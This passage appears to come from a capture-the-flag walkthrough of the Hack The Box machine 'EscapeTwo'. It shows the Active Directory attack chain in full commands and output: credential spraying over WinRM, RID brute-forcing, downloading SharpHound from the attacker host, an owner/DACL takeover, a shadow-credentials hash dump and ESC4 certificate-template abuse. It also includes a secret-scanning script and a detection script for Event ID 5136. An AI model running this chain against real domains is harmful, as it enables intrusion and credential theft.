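SAPWD="Example-SA-Pw-2"
IAcceptSQLServerLicenseTerms=True
"""
SAMPLE_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="Reports" connectionString="Server=DC01\\SQLEXPRESS;User Id=sa;Password=Example-Conn-Pw-3;" />
  </connectionStrings>
  <appSettings>
    <add key="ApiToken" value="Example-Token-4" />
    <add key="Theme" value="dark" />
  </appSettings>
</configuration>
"""


def scan_ini(text, source="<ini>"):
    """(source, '[section] KEY', value) for every INI key whose name looks secret and whose value is non-empty."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case so findings read as they appear in the file
    cp.read_string(text)
    hits = []
    for section in cp.sections():
        for key, value in cp.items(section):
            value = value.strip().strip('"')
            if SECRET_KEY.search(key) and value:
                hits.append((source, f"[{section}] {key}", value))
    return hits


def scan_xml(text, source="<xml>"):
    """Findings from .NET-style XML: connectionString attributes (password pulled out of the string)
    and <add key=... value=...> pairs whose key looks secret."""
    hits = []
    for el in ET.fromstring(text).iter():
        name = el.get("name") or el.get("key") or el.tag
        for attr, value in el.attrib.items():
            if attr == "connectionString" or (attr == "value" and SECRET_KEY.search(name)):
                m = CONNSTR_PW.search(value)
                hits.append((source, f"{el.tag} {name}", m.group(1) if m else value))
    return hits


def scan_all(files):
    """files: {path: text}. Dispatch on extension and collect all findings."""
    hits = []
    for path, text in files.items():
        low = path.lower()
        if low.endswith((".ini", ".cfg")):
            hits += scan_ini(text, path)
        elif low.endswith((".xml", ".config")):
            hits += scan_xml(text, path)
    return hits


if __name__ == "__main__":
    sample = {"C:/SQL2019/ExpressAdv_ENU/sql-Configuration.INI": SAMPLE_INI,
              "C:/inetpub/web.config": SAMPLE_CONFIG}  # placeholder paths for the demo
    for path, key, value in scan_all(sample):
        print(f"{path}: {key} = {value}")
```

On an engagement the dict would be filled from files copied off the host over SMB or the reverse shell; the extension dispatch is the only part that needs extending for other formats.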

5. Trying WinRM

  • Try SEQUEL\sql_svc : WqSZAF6CysD*****
┌──(chw㉿CHW)-[~]
└─$ crackmapexec winrm 10.10.11.51 -u sql_svc -p 'WqSZAF6CysD*****' -d sequel.htb
...
HTTP        10.10.11.51     5985   10.10.11.51      [*] http://10.10.11.51:5985/wsman
WINRM       10.10.11.51     5985   10.10.11.51      [-] sequel.htb\sql_svc:WqSZAF6CysD*****

SEQUEL\sql_svc : WqSZAF6CysD***** : failed

  • Spray WqSZAF6CysD***** against the userlist built earlier (EscapeTwo_name.txt, the users from the SMB file leak), on the chance that the password is reused.
    The lockout threshold is disabled (see the password policy above), so spraying carries no lockout risk here.
┌──(chw㉿CHW)-[~]
└─$ crackmapexec winrm 10.10.11.51 -u EscapeTwo_name.txt -p 'WqSZAF6CysD*****' -d sequel.htb 
...
HTTP        10.10.11.51     5985   10.10.11.51      [*] http://10.10.11.51:5985/wsman
WINRM       10.10.11.51     5985   10.10.11.51      [-] sequel.htb\sa:WqSZAF6CysD*****
WINRM       10.10.11.51     5985   10.10.11.51      [-] sequel.htb\angela:WqSZAF6CysD*****
WINRM       10.10.11.51     5985   10.10.11.51      [-] sequel.htb\oscar:WqSZAF6CysD*****
WINRM       10.10.11.51     5985   10.10.11.51      [-] sequel.htb\kevin:WqSZAF6CysD*****

EscapeTwo_name.txt with WqSZAF6CysD***** : failed

5.1 SMB RID brute-force (full domain user list)

┌──(chw㉿CHW)-[~]
└─$ crackmapexec smb 10.10.11.51 -u "rose" -p "KxEPkKe6R8su" --rid-brute  
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
SMB         10.10.11.51     445    DC01             [+] Brute forcing RIDs
SMB         10.10.11.51     445    DC01             498: SEQUEL\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.51     445    DC01             500: SEQUEL\Administrator (SidTypeUser)
SMB         10.10.11.51     445    DC01             501: SEQUEL\Guest (SidTypeUser)
SMB         10.10.11.51     445    DC01             502: SEQUEL\krbtgt (SidTypeUser)
SMB         10.10.11.51     445    DC01             512: SEQUEL\Domain Admins (SidTypeGroup)
SMB         10.10.11.51     445    DC01             513: SEQUEL\Domain Users (SidTypeGroup)
SMB         10.10.11.51     445    DC01             514: SEQUEL\Domain Guests (SidTypeGroup)
SMB         10.10.11.51     445    DC01             515: SEQUEL\Domain Computers (SidTypeGroup)
SMB         10.10.11.51     445    DC01             516: SEQUEL\Domain Controllers (SidTypeGroup)
SMB         10.10.11.51     445    DC01             517: SEQUEL\Cert Publishers (SidTypeAlias)
SMB         10.10.11.51     445    DC01             518: SEQUEL\Schema Admins (SidTypeGroup)
SMB         10.10.11.51     445    DC01             519: SEQUEL\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.51     445    DC01             520: SEQUEL\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.51     445    DC01             521: SEQUEL\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.51     445    DC01             522: SEQUEL\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.51     445    DC01             525: SEQUEL\Protected Users (SidTypeGroup)
SMB         10.10.11.51     445    DC01             526: SEQUEL\Key Admins (SidTypeGroup)
SMB         10.10.11.51     445    DC01             527: SEQUEL\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.51     445    DC01             553: SEQUEL\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.51     445    DC01             571: SEQUEL\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.51     445    DC01             572: SEQUEL\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.51     445    DC01             1000: SEQUEL\DC01$ (SidTypeUser)
SMB         10.10.11.51     445    DC01             1101: SEQUEL\DnsAdmins (SidTypeAlias)
SMB         10.10.11.51     445    DC01             1102: SEQUEL\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.51     445    DC01             1103: SEQUEL\michael (SidTypeUser)
SMB         10.10.11.51     445    DC01             1114: SEQUEL\ryan (SidTypeUser)
SMB         10.10.11.51     445    DC01             1116: SEQUEL\oscar (SidTypeUser)
SMB         10.10.11.51     445    DC01             1122: SEQUEL\sql_svc (SidTypeUser)
SMB         10.10.11.51     445    DC01             1128: SEQUEL\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB         10.10.11.51     445    DC01             1129: SEQUEL\SQLRUserGroupSQLEXPRESS (SidTypeAlias)
SMB         10.10.11.51     445    DC01             1601: SEQUEL\rose (SidTypeUser)
SMB         10.10.11.51     445    DC01             1602: SEQUEL\Management Department (SidTypeGroup)
SMB         10.10.11.51     445    DC01             1603: SEQUEL\Sales Department (SidTypeGroup)
SMB         10.10.11.51     445    DC01             1604: SEQUEL\Accounting Department (SidTypeGroup)
SMB         10.10.11.51     445    DC01             1605: SEQUEL\Reception Department (SidTypeGroup)
SMB         10.10.11.51     445    DC01             1606: SEQUEL\Human Resources Department (SidTypeGroup)
SMB         10.10.11.51     445    DC01             1607: SEQUEL\ca_svc (SidTypeUser)

Domain SEQUEL\ Userlist:
Administrator(RID: 500)
Guest(RID: 501)
krbtgt(RID: 502)
DC01$(RID: 1000)
michael(RID: 1103)
ryan(RID: 1114)
oscar(RID: 1116)
sql_svc(RID: 1122)
rose(RID: 1601)
ca_svc(RID: 1607)

Build a user list from the RID brute-force results and try the recovered password against WinRM

┌──(chw㉿CHW)-[~]
└─$ cat EscapeTwo_smb.txt                                             
Administrator
Guest
krbtgt
DC01$
michael
ryan
oscar
sql_svc
rose
ca_svc
                                                                   
┌──(chw㉿CHW)-[~]
└─$ crackmapexec winrm 10.10.11.51 -u EscapeTwo_smb.txt -p 'WqSZAF6CysD*****' -d sequel.htb 
/usr/lib/python3/dist-packages/cme/cli.py:37: SyntaxWarning: invalid escape sequence '\ '
  formatter_class=RawTextHelpFormatter)
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:324: SyntaxWarning: invalid escape sequence '\S'
  self.conn.execute_cmd("reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:338: SyntaxWarning: invalid escape sequence '\S'
  self.conn.execute_cmd("reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:49: SyntaxWarning: invalid escape sequence '\p'
  stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % self.__host
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:93: SyntaxWarning: invalid escape sequence '\{'
  command = self.__shell + 'echo '+ data + ' ^> \\\\127.0.0.1\\{}\\{} 2^>^&1 > %TEMP%\{} & %COMSPEC% /Q /c %TEMP%\{} & %COMSPEC% /Q /c del %TEMP%\{}'.format(self.__share_name, self.__output, self.__batchFile, self.__batchFile, self.__batchFile)
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:324: SyntaxWarning: invalid escape sequence '\S'
  self.conn.execute_cmd("reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:338: SyntaxWarning: invalid escape sequence '\S'
  self.conn.execute_cmd("reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
HTTP        10.10.11.51     5985   10.10.11.51      [*] http://10.10.11.51:5985/wsman
WINRM       10.10.11.51     5985   10.10.11.51      [-] sequel.htb\Administrator:WqSZAF6CysD*****
WINRM       10.10.11.51     5985   10.10.11.51      [-] sequel.htb\Guest:WqSZAF6CysD*****
WINRM       10.10.11.51     5985   10.10.11.51      [-] sequel.htb\krbtgt:WqSZAF6CysD*****
WINRM       10.10.11.51     5985   10.10.11.51      [-] sequel.htb\DC01$:WqSZAF6CysD*****
WINRM       10.10.11.51     5985   10.10.11.51      [-] sequel.htb\michael:WqSZAF6CysD*****
WINRM       10.10.11.51     5985   10.10.11.51      [+] sequel.htb\ryan:WqSZAF6CysD*****3 (Pwn3d!)

WinRM access obtained:
sequel.htb\ryan:WqSZAF6CysD*****

5.2 Log in via WinRM

┌──(chw㉿CHW)-[~]
└─$ evil-winrm -i 10.10.11.51 -u 'sequel.htb\ryan' -p 'WqSZAF6CysD*****'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> 

✅ Get User Flag

The user flag is in \Users\ryan\Desktop

Privilege Escalation

7. Check user information

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

*Evil-WinRM* PS C:\Users\ryan\Documents> net user ryan /domain
User name                    ryan
Full Name                    Ryan Howard
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/8/2024 9:55:45 AM
Password expires             Never
Password changeable          6/9/2024 9:55:45 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   6/9/2024 10:16:26 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Management Department*Domain Users
The command completed successfully.

8. BloodHound

SharpHound collection

*Evil-WinRM* PS C:\Users\ryan\Desktop> iwr http://10.10.14.179/SharpHound.ps1 -OutFile SharpHound.ps1 -UseBasicParsing
*Evil-WinRM* PS C:\Users\ryan\Desktop> . .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\ryan\Desktop> Invoke-BloodHound -CollectionMethod All -OutputDirectory "C:\Users\ryan\Desktop"
*Evil-WinRM* PS C:\Users\ryan\Desktop> ls


    Directory: C:\Users\ryan\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2025   9:20 PM          12342 20250507212055_BloodHound.zip
-a----         5/7/2025   9:21 PM          12374 20250507212157_BloodHound.zip
-a----         5/7/2025   9:21 PM           9503 NGZlZGJhNTUtZGMxZi00MzRhLTkxYzUtZWNjYjM1NGU4YzNl.bin
-a----         5/7/2025   9:14 PM        1308348 SharpHound.ps1
-ar---         5/7/2025   6:27 AM             34 user.txt

*Evil-WinRM* PS C:\Users\ryan\Desktop> download 20250507212157_BloodHound.zip
                                        
Info: Downloading C:\Users\ryan\Desktop\20250507212157_BloodHound.zip to 20250507212157_BloodHound.zip
                                        
Info: Download successful!

BloodHound analysis

  • Mark the compromised users as Owned
    image

sql_svc & Ryan

  • Inspect the rights of the Owned users: Ryan has WriteOwner over ca_svc
    image (ca_svc is a member of CERT PUBLISHERS)

9. Shadow Credentials Attack

🎯 Goal: obtain Kerberos credentials as ca_svc, then use them for AD CS privilege escalation to Administrator.

Use ryan to impersonate ca_svc and try to obtain a Kerberos TGT and the NTLM hash

┌──(chw㉿CHW)-[~]
└─$ certipy shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysD*****' -account ca_svc -dc-ip 10.10.11.51

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '59bf8f52-d75b-2973-8d51-************'
[*] Adding Key Credential with device ID '59bf8f52-d75b-2973-8d51-************' to the Key Credentials for 'ca_svc'
[-] Could not update Key Credentials for 'ca_svc' due to insufficient access rights: 00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

certipy shadow auto fails: the write to msDS-KeyCredentialLink is rejected (INSUFF_ACCESS_RIGHTS), because WriteOwner alone does not give ryan write access to that attribute

What certipy shadow auto actually does:

  1. Generate a self-signed certificate (certificate + private key).
  2. Convert that certificate into a KeyCredential structure.
  3. Try to write the KeyCredential into the msDS-KeyCredentialLink attribute of the ca_svc account:
    this is equivalent to "adding a spare key to ca_svc".
  4. Authenticate with that certificate via Kerberos PKINIT → obtain a TGT for ca_svc.
  5. Use the TGT to retrieve ca_svc's NTLM hash. Finally, restore the original KeyCredential automatically to clean up the trace.

9.1 Change the owner of the ca_svc object

Use bloodyAD to set ryan as the owner of ca_svc
(ryan has WriteOwner over ca_svc)

┌──(chw㉿CHW)-[~]
└─$ bloodyAD -d sequel.htb --dc-ip 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysD*****' set owner 'ca_svc' 'ryan'

[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svc

The owner of ca_svc is now ryan.

Only the owner can modify the ACL in the next step.

9.2 Edit the DACL → full control

Owning the object does not by itself grant rights over it: the owner may write the DACL, so dacledit is used to add a FullControl ACE for ryan, which gives ryan effective control over the object.

Grant ryan full DACL rights with impacket-dacledit

┌──(chw㉿CHW)-[~]
└─$ impacket-dacledit -action write -principal ryan -target ca_svc -dc-ip 10.10.11.51 sequel.htb/ryan:WqSZAF6CysD*****

/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
  'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
  'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
  'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
  'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
  'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
  'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
  'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
  'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
  'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
  'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.13.0.dev0+20250430.174957.756ca96e - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250508-024050.bak
[*] DACL modified successfully!

ryan can now write any attribute of the ca_svc object

9.3 Retry the Shadow Credentials attack

┌──(chw㉿CHW)-[~]
└─$ certipy shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysD*****' -account ca_svc -dc-ip 10.10.11.51                

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '7b8b6175-3afc-7a5a-59d9-9d6ae12a492a'
[*] Adding Key Credential with device ID '7b8b6175-3afc-7a5a-59d9-9d6ae12a492a' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '7b8b6175-3afc-7a5a-59d9-9d6ae12a492a' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e**********

ca_svc's NTLM hash is dumped
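From the defender's side, every step in 9.1 to 9.3 is a directory write that the DC records as Security Event ID 5136 (Directory Service Changes) when auditing is enabled. The following triage script is an added example, not part of the writeup or of any tool it uses; the event records are constructed in the shape of the 5136 EventData fields, with this box's names, and TRUSTED_WRITERS is an assumed allow-list.

```python
"""Triage Windows Security Event ID 5136 records for the takeover chain above:
an owner/DACL rewrite on a user object followed by a write to
msDS-KeyCredentialLink (shadow credentials), plus edits to a certificate
template. Added example; events are constructed, not real logs."""

from dataclasses import dataclass

VALUE_ADDED = "%%14674"    # 5136 OperationType: Value Added
VALUE_DELETED = "%%14675"  # 5136 OperationType: Value Deleted

# Assumed allow-list of principals expected to write these attributes
# (in practice: SYSTEM, Tier-0 admins, device-registration service accounts).
TRUSTED_WRITERS = {"SYSTEM", "Administrator"}


@dataclass
class Finding:
    severity: str
    rule: str
    subject: str
    target: str


def leaf_cn(dn: str) -> str:
    """CN=ca_svc,CN=Users,DC=sequel,DC=htb -> ca_svc."""
    rdn = dn.split(",", 1)[0]
    return rdn.split("=", 1)[1] if "=" in rdn else rdn


def triage_5136(events):
    findings = []
    for ev in events:
        attr, cls = ev["AttributeLDAPDisplayName"], ev["ObjectClass"]
        subject, target = ev["SubjectUserName"], leaf_cn(ev["ObjectDN"])
        added = ev["OperationType"] == VALUE_ADDED
        trusted = subject in TRUSTED_WRITERS
        if attr == "msDS-KeyCredentialLink" and added:
            # Accounts write their own key during Windows Hello / device registration;
            # a different principal adding a key to someone else's account is the
            # shadow-credentials pattern produced by certipy shadow auto.
            if subject.lower() != target.lower() and not trusted:
                findings.append(Finding("high", "key credential added to another account", subject, target))
        elif attr == "nTSecurityDescriptor" and added and cls in ("user", "computer") and not trusted:
            # bloodyAD set owner and dacledit both rewrite the object's security descriptor.
            findings.append(Finding("medium", "owner or DACL rewritten on account", subject, target))
        elif cls == "pKICertificateTemplate" and not trusted:
            findings.append(Finding("high", f"certificate template attribute {attr} modified", subject, target))
    return findings


def chained_takeovers(findings):
    """(subject, target) pairs showing both a DACL rewrite and a key add: the full chain."""
    dacl = {(f.subject, f.target) for f in findings if "DACL" in f.rule}
    keys = {(f.subject, f.target) for f in findings if "key credential" in f.rule}
    return dacl & keys


# Constructed sample events mirroring sections 9.1-9.3 and 10.2 (not real logs).
CA_SVC_DN = "CN=ca_svc,CN=Users,DC=sequel,DC=htb"
TEMPLATE_DN = ("CN=DunderMifflinAuthentication,CN=Certificate Templates,CN=Public Key Services,"
               "CN=Services,CN=Configuration,DC=sequel,DC=htb")

def ev(subject, dn, cls, attr, op=VALUE_ADDED):
    return {"SubjectUserName": subject, "ObjectDN": dn, "ObjectClass": cls,
            "AttributeLDAPDisplayName": attr, "OperationType": op}

SAMPLE_EVENTS = [
    ev("ryan", CA_SVC_DN, "user", "nTSecurityDescriptor", VALUE_DELETED),   # old SD removed
    ev("ryan", CA_SVC_DN, "user", "nTSecurityDescriptor"),                  # new owner/DACL written
    ev("ryan", CA_SVC_DN, "user", "msDS-KeyCredentialLink"),                # shadow credential added
    ev("ryan", CA_SVC_DN, "user", "msDS-KeyCredentialLink", VALUE_DELETED), # certipy restores old value
    ev("oscar", "CN=oscar,CN=Users,DC=sequel,DC=htb", "user", "msDS-KeyCredentialLink"),  # benign self-write
    ev("ca_svc", TEMPLATE_DN, "pKICertificateTemplate", "msPKI-Certificate-Name-Flag"),
]

if __name__ == "__main__":
    found = triage_5136(SAMPLE_EVENTS)
    for f in found:
        print(f"[{f.severity}] {f.subject} -> {f.target}: {f.rule}")
    print("chained takeovers:", chained_takeovers(found))
```

The restore step that certipy performs (the Value Deleted event) is what makes the one-off Value Added the only durable trace, so alert on the add rather than on the final attribute state.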

10. AD CS template vulnerability (ESC4)

10.1 Enumerate the AD CS configuration

Certificate authorities (CA) and certificate templates

Look for known AD CS weaknesses, for example:

  • ESC1: low-privileged users can enroll for a certificate
  • ESC4: FullControl over a template (it can be modified to impersonate a privileged account)
  • ESC6: the CA lets any requester specify a UPN

┌──(chw㉿CHW)-[~]
└─$ certipy find -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e********** -dc-ip 10.10.11.51 -vulnerable

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Saved BloodHound data to '20250508031445_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250508031445_Certipy.txt'
[*] Saved JSON output to '20250508031445_Certipy.json'

View the output:

┌──(chw㉿CHW)-[~]
└─$ cat 20250508031445_Certipy.txt
Certificate Authorities
  0
    CA Name                             : sequel-DC01-CA
    DNS Name                            : DC01.sequel.htb
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00
    Certificate Validity End            : 2124-06-08 17:00:40+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions

Full Control Principals: Cert Publishers. ca_svc happens to be a member of Cert Publishers, so it can modify the template's ACL and attributes.

ESC4 vulnerability

ADCS – ESC4
Template name: DunderMifflinAuthentication
Description: SEQUEL.HTB\Cert Publishers has Full Control over this template
👉🏻 ca_svc is a member of Cert Publishers, so it can rewrite the template and have a certificate issued for Administrator

10.2 Modify the certificate template

Rewrite DunderMifflinAuthentication so that it becomes an abusable template

Certipy handles this automatically:
✅ Remove the unnecessary EKU restrictions (e.g. Client Auth only)
✅ Disable manager approval (msPKI-Enrollment-Flag)
✅ Allow a UPN in the SubjectAltName (the requester chooses the target account)
✅ Ensure "enrollee supplies subject" is set
✅ Adjust the ACL (if needed)

┌──(chw㉿CHW)-[~]
└─$ certipy template -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e********** -template DunderMifflinAuthentication -target DC01.sequel.htb -dc-ip 10.10.11.51 -debug 

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'DC01.sequel.htb' at '10.10.11.51'
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.51:636 - ssl
[+] Default path: DC=sequel,DC=htb
[+] Configuration path: CN=Configuration,DC=sequel,DC=htb
[*] Updating certificate template 'DunderMifflinAuthentication'
[+] MODIFY_DELETE:
[+]     pKIExtendedKeyUsage: []
[+]     msPKI-Certificate-Application-Policy: []
[+] MODIFY_REPLACE:
[+]     nTSecurityDescriptor: [b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xc8\xa3\x1f\xdd\xe9\xba\xb8\x90,\xaes\xbb\xf4\x01\x00\x00']
[+]     flags: [b'0']
[+]     pKIDefaultKeySpec: [b'2']
[+]     pKIKeyUsage: [b'\x86\x00']
[+]     pKIMaxIssuingDepth: [b'-1']
[+]     pKICriticalExtensions: [b'2.5.29.19', b'2.5.29.15']
[+]     pKIExpirationPeriod: [b'\x00@\x1e\xa4\xe8e\xfa\xff']
[+]     pKIDefaultCSPs: [b'1,Microsoft Enhanced Cryptographic Provider v1.0']
[+]     msPKI-Enrollment-Flag: [b'0']
